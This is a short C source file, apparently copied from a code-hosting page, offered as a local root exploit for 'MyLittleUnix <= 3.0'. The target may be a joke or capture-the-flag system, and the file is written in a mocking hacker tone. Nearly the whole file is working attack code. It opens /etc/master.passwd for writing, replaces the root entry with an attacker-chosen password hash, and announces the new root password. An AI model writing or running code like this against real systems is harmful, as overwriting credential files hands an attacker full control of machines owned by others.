53 lines
No EOL
1.4 KiB
C
53 lines
No EOL
1.4 KiB
C
/* MyLittleUnix <= 3.0 VFS permissions root exploit
|
|
================================================
|
|
File permissions are not checked, we can abuse
|
|
this to replace the root user password with our
|
|
own and escalate our privileges. This exploit
|
|
now 20% cooler and tested on latest 3.0 mlp OS.
|
|
|
|
-- prdelka
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/stat.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
|
|
char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284"
|
|
"29a65f8f10ce388d301b47865a283147bfd290545b"
|
|
"0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e"
|
|
"594cadd:0:0:HackerFantastic:/home/root:/bi"
|
|
"n/sh:fancy\n";
|
|
|
|
int main(){
|
|
int fd, r;
|
|
struct stat *fileinfo = malloc(sizeof(struct stat));
|
|
char *buffer, *line, *filenm = "/etc/master.passwd";
|
|
printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n");
|
|
fd = open(filenm,O_RDWR);
|
|
r = stat(filenm,fileinfo);
|
|
buffer = malloc((uint)fileinfo->st_size);
|
|
if(buffer){
|
|
read(fd,buffer,fileinfo->st_size);
|
|
}
|
|
else{
|
|
printf("[!] No pwn for you pwnie\n");
|
|
exit(0);
|
|
}
|
|
lseek(fd,0,SEEK_SET);
|
|
line = strtok(buffer,"\n");
|
|
while(line){
|
|
if(strstr(line,"root:")){
|
|
write(fd,pwnystr,strlen(pwnystr));
|
|
}
|
|
else{
|
|
write(fd,line,strlen(line));
|
|
write(fd,"\n",strlen("\n"));
|
|
}
|
|
line = strtok(NULL,"\n");
|
|
}
|
|
close(fd);
|
|
printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n");
|
|
exit(0);
|
|
} |